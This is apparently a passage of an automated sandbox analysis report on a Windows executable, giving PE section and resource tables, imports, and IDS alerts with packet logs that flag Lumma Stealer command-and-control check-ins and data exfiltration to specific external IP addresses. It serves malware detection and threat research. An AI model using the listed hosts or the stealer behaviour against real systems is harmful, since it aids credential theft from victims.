                                                                                                                                                                                            0x10000x2200000x9c60005670189b9d493d1b45d3de210aac114unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x2210000x20000x10007dd2d3694b43bb63227ce0d2d1e44feeFalse1.002685546875data7.9592966862361605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x2230000xa0000x5600de1175467bd5d052911959d1b5502305False1.0007267441860466data7.992374830519767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x22d0000x72dc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x2350000x40000x320022ea727e6a1257553b828c6fdd38ab5bFalse1.000859375data7.985656497961463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x2390000x10000x6009cab9bce5312ee9c9bd811d403f2bfe2False1.0071614583333333data7.875711885838061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x23a0000x10000x20074f71468da1b55737682000bc627c78dFalse0.1953125data1.5418866354855536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x23b0000x540x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x23c0000x10000x200d58aef3d05954c1d99a9f4f63165b570False0.189453125data1.3719805754754903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x23d0000x300000x17000d40cc827c3cd714677c69e8d120b292dFalse1.0003821331521738data7.9979949916200175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .rsrc0x26d0000x1f0000x1ee00a5f8de394341b080b1e1b30d736d569eFalse0.27621299342105265data5.333825715798749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .data0x28c0000x5d0000x25e00025e4abd29243838c6680b1fc19617aeFalse0.9747511860561056data7.844543785300352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .adata0x2e90000x4f8a00x4ea001351af1596399beee70472163bacc128False0.6873136923688394data7.563705339735837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                            Resources

                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                            TYPELIB0x26dd680xcb4data0.34747847478474786
                                                                                                                                                                                            RT_CURSOR0x26ea1c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                            RT_CURSOR0x26eb500x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                            RT_CURSOR0x26ec840x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                            RT_CURSOR0x26edb80x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                            RT_CURSOR0x26eeec0x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                            RT_CURSOR0x26f0200x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                            RT_CURSOR0x26f1540x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                            RT_ICON0x26f2880x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.09187529522909778
                                                                                                                                                                                            RT_ICON0x2734b00x3a48Device independent bitmap graphic, 60 x 120 x 32, image size 14880EnglishUnited States0.09765415549597856
                                                                                                                                                                                            RT_ICON0x276ef80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.11919087136929461
                                                                                                                                                                                            RT_ICON0x2794a00x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720EnglishUnited States0.1349112426035503
                                                                                                                                                                                            RT_ICON0x27af080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.17847091932457787
                                                                                                                                                                                            RT_ICON0x27bfb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.24385245901639344
                                                                                                                                                                                            RT_ICON0x27c9380x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.2593023255813954
                                                                                                                                                                                            RT_ICON0x27cff00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3333333333333333
                                                                                                                                                                                            RT_STRING0x27d4580x230data0.375
                                                                                                                                                                                            RT_STRING0x27d6880xb58data0.26170798898071623
                                                                                                                                                                                            RT_STRING0x27e1e00x908data0.2867647058823529
                                                                                                                                                                                            RT_STRING0x27eae80x538data0.3712574850299401
                                                                                                                                                                                            RT_STRING0x27f0200x358data0.3107476635514019
                                                                                                                                                                                            RT_STRING0x27f3780x414data0.4128352490421456
                                                                                                                                                                                            RT_STRING0x27f78c0x1b0data0.5393518518518519
                                                                                                                                                                                            RT_STRING0x27f93c0xccdata0.6666666666666666
                                                                                                                                                                                            RT_STRING0x27fa080x1a8data0.5212264150943396
                                                                                                                                                                                            RT_STRING0x27fbb00x410data0.3855769230769231
                                                                                                                                                                                            RT_STRING0x27ffc00x3f4data0.383399209486166
                                                                                                                                                                                            RT_STRING0x2803b40x438data0.3814814814814815
                                                                                                                                                                                            RT_STRING0x2807ec0x418data0.29961832061068705
                                                                                                                                                                                            RT_STRING0x280c040x294data0.3151515151515151
                                                                                                                                                                                            RT_STRING0x280e980x420data0.3996212121212121
                                                                                                                                                                                            RT_STRING0x2812b80x4e0data0.3814102564102564
                                                                                                                                                                                            RT_STRING0x2817980x45cdata0.3387096774193548
                                                                                                                                                                                            RT_STRING0x281bf40x3c4data0.3848547717842324
                                                                                                                                                                                            RT_STRING0x281fb80x45cdata0.3906810035842294
                                                                                                                                                                                            RT_STRING0x2824140x19cdata0.441747572815534
                                                                                                                                                                                            RT_STRING0x2825b00xccdata0.6274509803921569
                                                                                                                                                                                            RT_STRING0x28267c0x198data0.5612745098039216
                                                                                                                                                                                            RT_STRING0x2828140x3c8data0.37913223140495866
                                                                                                                                                                                            RT_STRING0x282bdc0x3b4data0.3407172995780591
                                                                                                                                                                                            RT_STRING0x282f900x354data0.3884976525821596
                                                                                                                                                                                            RT_STRING0x2832e40x2b0data0.4186046511627907
                                                                                                                                                                                            RT_RCDATA0x2835940x10data1.5
                                                                                                                                                                                            RT_RCDATA0x2835a40x148bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020916524054002
                                                                                                                                                                                            RT_RCDATA0x284a300x111ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025102692834322
                                                                                                                                                                                            RT_RCDATA0x285b500xd8cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                                                                                                                                                                                            RT_RCDATA0x2868dc0x818data0.527992277992278
                                                                                                                                                                                            RT_RCDATA0x2870f40x2dataEnglishUnited States5.0
                                                                                                                                                                                            RT_RCDATA0x2870f80x3db4Delphi compiled form 'TfrmActivationWizard'0.7175867308179286
                                                                                                                                                                                            RT_RCDATA0x28aeac0x17cDelphi compiled form 'TfrmEnterSerialNumber'0.7605263157894737
                                                                                                                                                                                            RT_RCDATA0x28b0280x10bDelphi compiled form 'TfrmMain'0.797752808988764
                                                                                                                                                                                            RT_GROUP_CURSOR0x28b1340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                            RT_GROUP_CURSOR0x28b1480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                            RT_GROUP_CURSOR0x28b15c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                            RT_GROUP_CURSOR0x28b1700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                            RT_GROUP_CURSOR0x28b1840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                            RT_GROUP_CURSOR0x28b1980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                            RT_GROUP_CURSOR0x28b1ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                            RT_GROUP_ICON0x28b1c00x76dataEnglishUnited States0.7542372881355932
                                                                                                                                                                                            RT_VERSION0x28b2380x3b0dataEnglishUnited States0.4480932203389831
                                                                                                                                                                                            RT_MANIFEST0x28b5e80x70bXML 1.0 document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.403771491957848

                                                                                                                                                                                            Imports

                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            kernel32.dllGetProcAddress, GetModuleHandleA, LoadLibraryA
                                                                                                                                                                                            wininet.dllInternetCloseHandle
                                                                                                                                                                                            winspool.drvDocumentPropertiesW
                                                                                                                                                                                            comctl32.dllImageList_GetImageInfo
                                                                                                                                                                                            shell32.dllShell_NotifyIconW
                                                                                                                                                                                            user32.dllCopyImage
                                                                                                                                                                                            version.dllGetFileVersionInfoSizeW
                                                                                                                                                                                            oleaut32.dllSetErrorInfo
                                                                                                                                                                                            advapi32.dllRegSetValueExW
                                                                                                                                                                                            msvcrt.dllmemcpy
                                                                                                                                                                                            ole32.dllCoRevokeClassObject
                                                                                                                                                                                            gdi32.dllPie
                                                                                                                                                                                            ntdll.dllRtlGetVersion
                                                                                                                                                                                            oleaut32.dllVariantChangeTypeEx
                                                                                                                                                                                            kernel32.dllRaiseException

                                                                                                                                                                                            Exports

                                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                                            __dbk_fcall_wrapper20x411c24
                                                                                                                                                                                            dbkFCallWrapperAddr10x630644

                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                            2024-12-27T20:23:18.002105+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:18.731342+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:18.731342+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:19.956817+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:20.728467+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:20.728467+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:22.407806+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:24.782155+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:25.616036+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449738172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:27.141426+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:29.762192+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:31.908103+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:34.752549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:34.762314+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449744172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:38.671124+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:39.459519+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745172.67.166.49443TCP
                                                                                                                                                                                            2024-12-27T20:23:41.243554+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746185.161.251.21443TCP
                                                                                                                                                                                            2024-12-27T20:23:43.165270+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747172.67.208.58443TCP
                                                                                                                                                                                            2024-12-27T20:23:44.051342+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.208.58443192.168.2.449747TCP

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Dec 27, 2024 20:23:16.653430939 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:16.653502941 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:16.653593063 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:16.733021021 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:16.733046055 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.001988888 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.002104998 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.004678965 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.004688025 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.005006075 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.052908897 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.052946091 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.053056955 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.731348038 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.731465101 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.731545925 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.734751940 CET49731443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.734769106 CET44349731172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.743818045 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.743853092 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:18.744002104 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.744370937 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:18.744381905 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:19.956747055 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:19.956816912 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:19.958451033 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:19.958458900 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:19.958780050 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:19.960069895 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:19.960181952 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:19.960207939 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.728425980 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.728487015 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.728529930 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.728535891 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.728560925 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.728601933 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.728609085 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.734819889 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.734873056 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.734879017 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.743223906 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.743273020 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.743282080 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.751708984 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.751800060 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.751805067 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.803147078 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.847903013 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.896878958 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.896888971 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.931404114 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.931453943 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.931483030 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.931489944 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.931543112 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.939368010 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.939500093 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:20.939555883 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.939614058 CET49732443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:20.939624071 CET44349732172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:21.102788925 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:21.102849960 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:21.102922916 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:21.103441954 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:21.103456020 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:22.407715082 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:22.407805920 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:22.409110069 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:22.409121037 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:22.409320116 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:22.410587072 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:22.410737991 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:22.410772085 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:22.410829067 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:22.410835981 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:23.405519009 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:23.405636072 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:23.405694008 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:23.405787945 CET49734443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:23.405802011 CET44349734172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:23.523839951 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:23.523879051 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:23.523936987 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:23.524216890 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:23.524231911 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:24.782087088 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:24.782155037 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:24.786238909 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:24.786248922 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:24.786487103 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:24.831093073 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:24.831331015 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:24.831362009 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:25.616002083 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:25.616091013 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:25.616131067 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:25.616601944 CET49738443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:25.616621971 CET44349738172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:25.878345966 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:25.878403902 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:25.878489971 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:25.878830910 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:25.878844976 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:27.141228914 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:27.141426086 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:27.142613888 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:27.142621994 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:27.142822027 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:27.148920059 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:27.149041891 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:27.149071932 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:27.149180889 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:27.149189949 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:28.042659998 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:28.042741060 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:28.042942047 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:28.043068886 CET49740443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:28.043082952 CET44349740172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:28.540189981 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:28.540241003 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:28.540360928 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:28.540982962 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:28.540999889 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:29.762109041 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:29.762192011 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:29.776351929 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:29.776371956 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:29.776582003 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:29.785270929 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:29.785384893 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:29.785413027 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:30.554227114 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:30.554316044 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:30.554366112 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:30.554599047 CET49742443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:30.554616928 CET44349742172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:30.635354042 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:30.635476112 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:30.635575056 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:30.636085987 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:30.636121988 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:31.907896042 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:31.908102989 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:31.909379005 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:31.909399986 CET44349743172.67.166.49192.168.2.4
